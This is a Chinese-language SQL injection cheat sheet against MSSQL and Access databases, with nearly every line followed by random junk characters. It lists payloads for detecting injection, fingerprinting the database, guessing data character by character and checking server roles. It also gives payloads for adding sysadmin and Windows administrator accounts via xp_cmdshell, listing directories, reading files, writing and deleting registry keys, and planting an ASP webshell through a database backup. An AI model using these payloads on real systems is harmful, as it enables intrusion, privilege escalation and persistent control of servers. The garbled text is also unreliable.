1.判断是否有注入;and 1=1 ;and 1=2 /$<JC�N�Gv
2.初步判断是否是mssql ;and user>0 uk1v7#�p��
"
gwm23Rpj
3.注入参数是字符'and [查询条件] and ''=' 0sY#MHPT�&
P[6dTZ!�\s
4.搜索时没过滤参数的'and [查询条件] and '%25'=' #C'�o'%!(
Q0�_M-^~WT
5.判断数据库系统 � !zF4 G,W
�UU-v�;_oP
;and (select count(*) from sysobjects)>0 mssql }$�w�4SpR
(
/�
G)"�]
;and (select count(*) from msysobjects)>0 access ~F=#}6kg_�
Ds;Rb6WcnY
u�k`d,xF �
/�X�bY<�pj
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��E�gCp:L{
hE�9'F(87a
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 j�(UX
6�lR
m|(I} |kT3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vl>����_e
B44]NsYks~
9.(1)猜字段的ascii值(access) i:�Aj�WC@]
~4}*D�hsh�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 H,/~=�d:
^
/{49I,����
(2)猜字段的ascii值(mssql) e=Y�O.H�T�
gE�-l�M/w
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {��Nz�mb|&
P]�{B^,��E
10.测试权限结构(mssql) z[_��R"+ �
s�=��3EB�h
'�J�J1#kKa
�X�tnIK��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- aEV|>K=6Y'
�x�u�w�//F
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <x.�]O�ZgO
E�Xv\FU�zo
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Cj���`pw2.
q�YQUr8�{
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �G}Q�}��H*
}�:K�\)Pd
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Z^j�GT+� 2
q{jk.:;�'�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 5EV�B27k��
�}3�9M_4a&
;and 1=(select IS_MEMBER('db_owner'));-- �(��e>RNn\
��rin >r0o
� �-fx(H+�
1�gf/#+�$\
11.添加mssql和系统的帐户 w}�]3jc8�4
])3lH�%�4-
;exec master.dbo.sp_addlogin username;-- �_.oRVYK�/
;exec master.dbo.sp_password null,username,password;-- &h�_�d��|8
Q;{D8 �#!�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �9Rb�Ga
Y&
�*��q�\HFI
;exec master.dbo.xp_cmdshell 'net user username password #�khyy-�B=
Y�)@oo�=oG
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- =�[v2�����
znGZUL�a#
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �CfazD??x
s8��/ozaeo
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- (2�h�k <��
�A`+(VzZgJ
0KNH=��;d}
�B�h.6:9�{
12.(1)遍历目录 WVBE>�T�B
b{9Ho�oQ{
;create table dirs(paths varchar(100), id int) $j$�\ccG��
!>�"�I�Nmz
;insert dirs exec master.dbo.xp_dirtree 'c:\' f@,hO5h(_|
+d�PE!��:
;and (select top 1 paths from dirs)>0 O��sHkAI
��z�EA{%)W
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Pl�y2�DQr
��h|�$�zHm
��;
�HR\R�
�n�oB�}p�4
(2)遍历目录 �;d�pS@;v�
Wr}��a�\}R
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �\?p9qR;"4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 yE!7`c.[�u
�2={K-s20�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 q%)*�,I�<
iZVT% A+q�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �;]�8p:ME
H/� B^N,oi
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��XO8 H]
�"pKGUM���
1^Y:�XJ7�3
�,vHX>)M�|
13.mssql中的存储过程 yA`]%U((��
tjc5>T[Es8
xp_regenumvalues 注册表根键, 子键 0B!�mEg���
d��}^�:��E
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 e�[|�p0 ,Q
�s�$�3e�J|
xp_regread 根键,子键,键值名 F#3�$p$;B$
r4z}y�t��+
;exec xp_regread �AS/\IHZ�\
XV�0<pV>��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 &*?!*+�!,i
` w�sMybe#
xp_regwrite 根键,子键, 值名, 值类型, 值 n"Z�,-./�m
?\/d�fK:!�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 [{d[f|���
njx\$,�ruN
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 O#��89M�%�
p-i]l.mT�5
xp_regdeletevalue 根键,子键,值名 rg]A�_(3Bb
II f >z_m
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]�#Z$jq{�,
Q& u�n��A3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 bvxxE/?�Ni
_sD]�Vi�qc
mc[�_�>�[m
Y-q,��Ovf!
14.mssql的backup创建webshell @�,f,tk=\S
J*W;{�Vt�y
use model �`HZHVV$~�
hdNZ"��:1s
create table cmd(str image); pC?1�gc1G�
2L{:���H��
insert into cmd(str) values (''); ^.$�r1/�U�
@k��g���pq
backup database model to disk='c:\l.asp'; JOoLH�ZQ1v
���.L�5T4)
D}
<�o<�Dk
c��r�O�tQ�
15.mssql内置函数 ]Rys=.���!
dA!f�v`,6-
;and (select @@version)>0 获得Windows的版本号 ',��xs�Ugk
U�Y?]\4O�m
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �D���;;��o
j]]��ziz,E
;and (select user_name())>0 爆当前系统的连接用户 =�;-ju@d�
%�RR|QY*��
;and (select db_name())>0 得到当前连接的数据库 oqU#I�~ -
j2v[-N4 {J
'/]A�af@U8
�d)J] Y=j�
16.简洁的webshell
'�Q;?_,�`
�k��=q%FlE
use model (�;�S�]{z%
C
Wl9�5��g
create table cmd(str image); ��1�'._SMP
��*Uw��#��
insert into cmd(str) values (''); ��$�h�Y]EB
�T>:g�
�ME
backup database model to disk='g:\wwwtest\l.asp';
